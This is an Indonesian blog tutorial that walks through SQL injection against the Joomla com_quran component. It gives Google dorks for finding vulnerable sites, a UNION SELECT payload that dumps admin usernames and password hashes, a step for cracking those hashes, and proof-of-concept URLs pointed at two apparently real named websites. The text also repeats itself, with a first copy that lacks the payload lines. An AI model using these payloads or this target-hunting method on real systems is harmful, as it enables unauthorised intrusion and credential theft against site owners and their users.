Filename | Exploit Joomla Component Com_quran Vulnerability |
Permission | rwxr--r-- |
Author | Fell Sadiz |
Modified | 7/05/2012 12:20:00 AM |
Group | Exploit | Hacking | Tutorial |
Actions | |
Navigation | / Home / Exploit / Hacking / Tutorial / Exploit Joomla Component Com_quran Vulnerability |
Sempet sebelumnya saya juga telah menulis sebuah exploitasi yang juga dilakukan pada cms jommla yang terdapat pada kommponent jobprofile yang dapat anda baca disini.
namun berbeda yang injecti/exploitasi kita kali ini terdapat pada komponen com_quran
dan rata-rata situs Islam yang memakai komponen tersebut dapat di exploitasi dengan parameter sql.
GOOGLE DORK :
EXPLOITASI :
1. Buka google dan lakukan searching menggunakan beberapa kode dork diatas, kemudian pilihlah salah satu link target dari hasil pencarian tersebut.
Sample Target: http//situs/index.php?option=com_quran&action=viewayat&surano=08
2. Kemudian Hapuslah semua link di akhir domain situs target tersebut dan masukan kode Exploit diatas sehingga menjadi seperti ini :
3. Password yang didapat masih berbentuk md5 jadi silahkan buka situs situs seperti http://md5crack.com untuk memecahkan hash tersebut.
POC :
#Situs Islam coy jangan dirusak :v
namun berbeda yang injecti/exploitasi kita kali ini terdapat pada komponen com_quran
dan rata-rata situs Islam yang memakai komponen tersebut dapat di exploitasi dengan parameter sql.
GOOGLE DORK :
allinurl:"com_quran"
allnurl:"/index.php?option=com_quran"
EXPLOITASI :
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password),3,4,5+from+jos_users+limit+0,20--
1. Buka google dan lakukan searching menggunakan beberapa kode dork diatas, kemudian pilihlah salah satu link target dari hasil pencarian tersebut.
Sample Target: http//situs/index.php?option=com_quran&action=viewayat&surano=08
2. Kemudian Hapuslah semua link di akhir domain situs target tersebut dan masukan kode Exploit diatas sehingga menjadi seperti ini :
http//situs_islam.com/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password),3,4,5+from+jos_users+limit+0,20--
3. Password yang didapat masih berbentuk md5 jadi silahkan buka situs situs seperti http://md5crack.com untuk memecahkan hash tersebut.
POC :
http://ridhoallah.com/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password),3,4,5+from+jos_users+limit+0,20--
http://yaseen.org/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password),3,4,5+from+jos_users+limit+0,20--
#Situs Islam coy jangan dirusak :v
0 Respons: